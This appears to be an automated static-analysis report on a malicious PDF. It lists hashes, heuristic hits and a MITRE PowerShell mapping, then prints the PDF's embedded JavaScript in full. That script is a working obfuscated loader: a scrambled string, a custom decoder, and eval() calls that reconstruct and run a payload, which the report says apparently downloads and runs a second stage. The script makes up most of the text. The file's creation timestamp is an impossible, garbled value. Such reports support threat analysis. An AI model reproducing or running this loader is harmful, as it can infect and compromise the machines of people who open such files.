Malicious PDF — malware analysis report

Static analysis result for SHA-256 b2d7d01561b68993…

MALICIOUS

PDF

7.1 KB Created: 2008-31-20 53:85:00 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 47d4dca7421b8ce8cbf7721a6832001a SHA-1: a6bc35243b8aba4deba453e445a740bf3d2ed1a4 SHA-256: b2d7d01561b689934071657f60d8ac69df3378242c2262ece1f963b8dd57b72d
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The embedded JavaScript uses eval() calls and string concatenation to construct and execute code. The primary intent appears to be downloading and executing a second-stage payload, as suggested by the complex string manipulation and eval usage. The specific JavaScript code is too obfuscated to fully reconstruct its exact actions, leading to a moderate confidence level.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function QoqdoAHtTAHVa() {var datfield = 'km01f195mGt@8cTTHik'+'MkQiiH@tB'+'kB'+'S0'+'f0B'+'x'+'Z'+'tFTkm'+'B'+'B'+'H5kBJGQNkk'+'BC@5fMNk1lNo'+'BxI_o0ZCk'+'@'+'Nvkp@PAiPitC'+'cbBkooA'+'iW'+'1FBZokNi1'+'AjL'+'1Pk8i'+'x1H'+'7B9'+'HJkBZq7@Ck'+'L9'+'Y'+'yt'+'I1'+'BxjWlk'+'@Nvkp@1Fjl971BmUIF0tTl17'+'1BmUIF0kil971BmUIF0Qdx'+'@y1xi'+'y0JVt9'+'Z'+'9idPitCcb'+'BkoG7@'+'Jviif'+'@kB1lyNkCk'+'@Nvkp@b'+'iil1791Vt19otNH19lgbSxbJQkA0'+'@jJ9'+'Fxkm01f1'+'A0BUiMZUQp'+'019Lk9ixBpk@T1U1BptTkm01'+'f19p2GSNLl1kkQii1 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3DD 5662 bytes
SHA-256: d85dabd8e143543462747538a6998386b96411035679c3aff7e31bf60f8ad6dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). 114 of 195 identifiers look randomly generated (e.g. 'fC1AjxiwMY5BN01UWBQTilQiiI97Ad9F0FGKCTyB'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function QoqdoAHtTAHVa() {var datfield = 'km01f195mGt@8cTTHik'+'MkQiiH@tB'+'kB'+'S0'+'f0B'+'x'+'Z'+'tFTkm'+'B'+'B'+'H5kBJGQNkk'+'BC@5fMNk1lNo'+'BxI_o0ZCk'+'@'+'Nvkp@PAiPitC'+'cbBkooA'+'iW'+'1FBZokNi1'+'AjL'+'1Pk8i'+'x1H'+'7B9'+'HJkBZq7@Ck'+'L9'+'Y'+'yt'+'I1'+'BxjWlk'+'@Nvkp@1Fjl971BmUIF0tTl17'+'1BmUIF0kil971BmUIF0Qdx'+'@y1xi'+'y0JVt9'+'Z'+'9idPitCcb'+'BkoG7@'+'Jviif'+'@kB1lyNkCk'+'@Nvkp@b'+'iil1791Vt19otNH19lgbSxbJQkA0'+'@jJ9'+'Fxkm01f1'+'A0BUiMZUQp'+'019Lk9ixBpk@T1U1BptTkm01'+'f19p2GSNLl1kkQii1VB9'+'x5B'+'1B@'+'kjLk9B9pikxk9B9pik'+'xk'+'9B9'+'pik'+'x'+'k9B'+'BmfCS@9Bxp1kS@9'+'BNmUl5k9Bp9Pl5k9Bp9i@0k9BPcK@'+'xk9BPlik'+'xk9BPlSCy@9BP'+'Ui@1k9BzcfC3@'+'9'+'B'+'zcSCz@9'+'BpCK'+'kz@9B7cLkP@9BPcfC'+'z@9BNA1Cz@9'+'BP51lz@9B5mSk'+'9k'+'9B9CPCxk9B5'+'mSk9k9BNkfCIk9B'+'P'+'cL@xk9'+'BP'+'cfCS@9BNA1Cz@'+'9BSoi@'+'xk9BNBiTIk'+'9BP01l0k'+'9B'+'BZi@'+'x'+'k9BPcf@0k'+'9BPcfCz@9By'+'0SkNk9BSo1C'+'S'+'@9BIZi'+'TIk9BNk1@0k'+'9BBZ1C0k9BP'+'cf@z@9BPcfCz@9By0S'+'kNk9B'+'So1CIk'+'9B30LTIk9'+'B091kz@9BB'+'ZP@7@9BPcL@7@9B'+'PcfCz@'+'9By0SkNk9BSo1Cxk9BB9iTIk9BBmS@0k9'+'BBZiTz@9BPcK@S@9BPcf'+'Cz'+'@9By'+'0SkNk9BSoPCz@9BfkLTIk9BBBfTNk9BBZ1kIk9BPcS@5k9BPcfCz@'+'9By0SkNk9By'+'cSCS@9B7JP'+'kz@9B5BS'+'@3@9BNm1'+'@'+'1k9BzJ1ly@9BPUi@Nk9BPcfCP@'+'9BS01Cz@9'+'B5BSkNk9BNAUl'+'S@9BPlfly'+'@9BP@LT1k9'+'BNAPlNk9BzJP'+'ly@9BBZPl5k9BPcSk9'+'k9B'+'Pc'+'fCz@9BpZ'+'Plz@9'+'Bz'+'@i'+'C5k9B5mK'+'lBk9BIFi@Ik9'+'BPcfCz@9'+'BNm1Cz@9Bz5'+'1ly@9B'+'f'+'BSk9k9BfmSk'+'3@9BN'+'m'+'Pl'+'z@9B3cfly@9B09iTIk9BPcfCz@9BScf'+'Cz@9By'+'0Sk9k'+'9B'+'pkPCS@9BSc1C7@9BS0Sk9k9BBZ'+'PCIk9BPc'+'LTP@9BPcfCz@9By'+'0f'+'C3@'+'9BfFUlz@9BS51Cz@'+'9B'+'301'+'T0k9BfFiTy@9BPlfl'+'z@9BpBf'+'TIk9BPcfCz'+'@9'+'B'+'5Bf@Bk9BNAUlz@9'+'BP51ly@9'+'BP@LT1k'+'9B'+'NA'+'PlN'+'k9BzJP'+'ly@9B'+'ycL@'+'Ik9BPcfCz@9Bpk1Cz@'+'9BSJ1Cpk'+'9By'+'0fC3@9B7'+'5KlS@9B'+'S5K@'+'9k9B09Pl3@'+'9B3cfTy@9BS5'+'Slz@9'+'By0Sk'+'9k9BpkPCxk9'+'BSc1Cy@9BS0Sk'+'9k'+'9B'+'BZPCIk9BPcKl3@9B'+'PcfCz@9BPcLT1'+'k9'+'B5Bf'+'@Bk'+'9BN'+'AUlz@9B'+'PJ1ly@9'+'B'+'PiL'+'T1k9B'+'NAPlNk9BzJPly@9B'+'zcL@Ik9BPcfCz@9Bpk1Cz@9B'+'NA1@Bk9Bz'+'cfl'+'y@9BP'+'@L'+'T1'+'k9BNAPlNk9BzJ'+'Pl'+'y@9BPcL@Ik9'+'BP'+'cfCz'+'@9By@fCz@9BSiSl9'+'k9'+'BBk'+'fC3@9BBkfC3@9BBk'+'fC'+'3@9BB'+'kfC3@9BBp'+'Pk3@9BS@1C'+'S@9BNAPl3@9BBAK@1k9BSi'+'f@pk'+'9BBmf@Bk9BN'+'APly@9BN'+'Ai@'+'xk9B'+'PJ1Tfk9BSlPk9k9BS'+'o1C'+'xk'+'9B5pSk9'+'k9B'+'NAiCxk9Bz01TS@9BP5fTIk9BSo'+'1@3'+'@9'+'B5tPk9k9BP'+'5Klz@9B75f@3@'+'9'+'BycP@Nk9B9C'+'1lP@9BfpfC3@9B7'+'5Sl5k9'+'BP1'+'1@'+'5'+'k9Bzcfk'+'0'+'k9B0A'+'LC1k9BPJ1'+'TS@9BfBP@P@9BP5fCfk9Bycf@7'+'@'+'9B0k'+'L@9k9B0BiC9k9B5BS'+'l0'+'k9BS@i@y'+'@9'+'B'+'BA'+'Pk'+'9k9BS'+'@Pk9k9'+'BP'+'5KlS'+'@9BptU'+'@fk9BP5Pk9'+'k9BNA1l9k'+'9Bz5Pl1k9BxC1C3@9BPlSk'+'9k9BP5Sk'+'9k9B'+'S0P@y@'+'9BfASlfk9BPcfCI'+'k9B'+'0CL@'+'Ik'+'9B'+'091@0k9BS'+'0'+'f'+'@Bk9B'+'y5P'+'l7@9B'+'y11lfk9'+'BPcfl0k9BIAPkpk9B'+'I9Uk9k9BfmK@y'+'@9B'+'NAP@z'+'@9BNZP'+'k5k9BIAPk5k9'+'BIAUkxk9BIZPkz@9'+'Bf'+'kSkP@9BNFUkBk9'+'BNk'+'KkBk9BIAPk1k9BIkP@P@9BfmK'+'kxk9BNmSk3@9BNAPk0k9BI9P@P@9BI9P'+'kpk'+'9BNtU@'+'z@9BxASk9k9BfmU@I'+'k9BI9Ukxk9'+'BxAS'+'k3@9BB9U@9C9j'+'W97B@l'+'@ino'+'kWmi'+'1CFq3kY0@il9A@pii'+'@'+'B9i'+'@'+'B'+'viiN0Q0kmT9fZkIt530P'+'bL5kQ'+'iiU'+'bKMHlQ@1gA'+'NiVt'+'99UkiE97@W97B@l@iPit'+'CcbB'+'ko'+'19Lkmx'+'IvP'+'kkP'+'i3WNZf'+'0'+'kQAiZmT9fZkIt'+'530PbL589'+'i'+'x'+'x'+'F1jW97B@l@iL1Pk8ix1kQi'+'i1VB'+'9x5B1B@kjLk9'+'B591TBk9B'+'591TBC'+'9j'+'W'+'971BmUIF0k'+'il999P0tlVc1kyc0I'+'5JPxxU71BmUIF0kdkkL9YytI1'+'BxjW97B@l'+'@iXU@@O0tp'+'NkfC'+'T1'+'9L'+'kF'+'A0BUiMZUQp019dk'+'9ix99i@B9i@Ju'+'7pJUTN9kLp6cUC0b'+'iid'+'GQ0kF7B@l@i81'+'i0fox'+'lSU3If'+'iBMl9UT81i0foxlS'+'U3IfiBM'+'C_@'+'x'+'Bgf1'+'ac1C'+'P5t'+'T81i0foxlSU3IfiBM8v9jkv@i'+'o'+'PtNxvQppgk'+'9gbwIB9y0b0SlvqQ0AyfXkQiiL'+'1P'+'k8'+'ix1'+'k'+'vAi'+'U'+'bKM'+'Hl'+'Q@1viil1'+'9fkmBBH5kBJ'+'GQNkA30Fl'+'@x8UkjJ9F'+'xkm01f19BgGKk'+'9'+'uBW1i'+'iil991B1ydNoB9I@Q0n@'+'Q0xo'+'tNHVAB'+'e5TBfoQNjU9jW99BgG'+'Kk'+'9uBW1i'+'ii'+'l99BgGKk9uBW1iPdf@k'+'0m0t1i'+'U'+'Fd_iKdjP7iLtFTkm01f1'+'F0FGKC'+'TyB0B9'+'9Lk'+'gB9I19l'+'fl015'+'U9BgGKk9uBW1iPdTUB1f0LBZ91jmk@MrJike'+'oxB9gF1Z0Q0'+'yi@j0tAd'+'1PKMIAUNb@@kHpk'+'I@l0l9'+'U7'+'@'+'JtFTkt'+'Q9kFAjxi'+'wMY5BN01UWBQTilQiip'+'97Ad'+'9AjZp@prJK1c0@@R01X'+'k'+'Q'+'1LkBiidm'+'Aix'+'iwMY5B'+'N01UWfQT'+'i'+'C97@J9AfC'+'1F0FGKCTy'+'B0Bvx@'+'q1ALkB1jJ9A'+'fC1AjxiwMY5BN01UWBQTilQiiI97Ad9F0FGKCTyB0Bvx@q1ALk'+'B1jk7@fkFF0FGKCTy'+'B0BvT@q1A'+'LkZ1jJ9Fxk'+'BLM'+'2q0Wjci90U9jW97B@'+'l@iwVfp1Zkil99BH@t0T0k0iU7iik@@T1U1ik@@T'+'1'+'U1'+'LtFTkZ@IJPB9Zp3MU@U9H7B9HJkBZ1AL'+'kAik5kP@J9F5O@xk'+'j1Fjl'+'9'+'F5O@xkjbi'+'i9UBIxVF1ePkN'+'@lt59G'+'Q0i19LkpKNmP'+'B1LVF1e'+'PkNi5kBPyB1JPB4HctNZ'+'vo0'+'1lQIX97iL79NxJQTkp3MU@U9loFT'+'kQ@il'+'1'+'Apfi30p'+'bkIZt'+'FT'; function uJIGghb5ne(CYwFsPd9){ var tp = '63@59@5@13@49@55@20@10@37@58@0@0@0@0@0@0@47@42@62@50@17@36@26@7@32@57@39@28@44@48@56@0@11@14@21@12@45@27@3@53@52@9@38@0@0@0@0@18@0@25@23@35@40@33@60@2@16@43@41@46@51@34@24@31@54@19@1@4@30@6@22@29@61@15@8'; var QzgHMulnxq0=0, HzBH5Zm9F=CYwFsPd9.length, FoSz59gfDTK=1024, xs46kTjtV0shQ, pD6XLmL, tPwS60wPGmIK='', mnawJ=QzgHMulnxq0, e2BmIOspjfAXQ=QzgHMulnxq0, Mtfdp5ucN=QzgHMulnxq0, AQ36MMpCN=Array(); AQ36MMpCN = tp.split('@'); for(eval('pD6XLmL=Ma'+'th.'+'ce'+'il(HzBH5Zm9F'+'/FoSz59gfDTK)');pD6XLmL>QzgHMulnxq0;pD6XLmL--){ for(eval('xs46kTjtV0shQ=M'+'ath'+'.m'+'in(HzBH5Zm9F,'+'FoSz59gfDTK)');xs46kTjtV0shQ>QzgHMulnxq0;xs46kTjtV0shQ--,HzBH5Zm9F--){ eval('Mtfdp5ucN|'+'=(AQ36MMpCN['+'CYwFsPd9.'+'cha'+'rCo'+'de'+'At(mnawJ+'+'+)-48])<'+'<e2BmIOspjfAXQ'); if(e2BmIOspjfAXQ){ eval('tPwS60wPGmIK+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](142^'+'Mtfdp5ucN&'+'25'+'5)'); Mtfdp5ucN>>=8; e2BmIOspjfAXQ-=2; } else { e2BmIOspjfAXQ=6; } } } eval(tPwS60wPGmIK); } uJIGghb5ne(datfield);}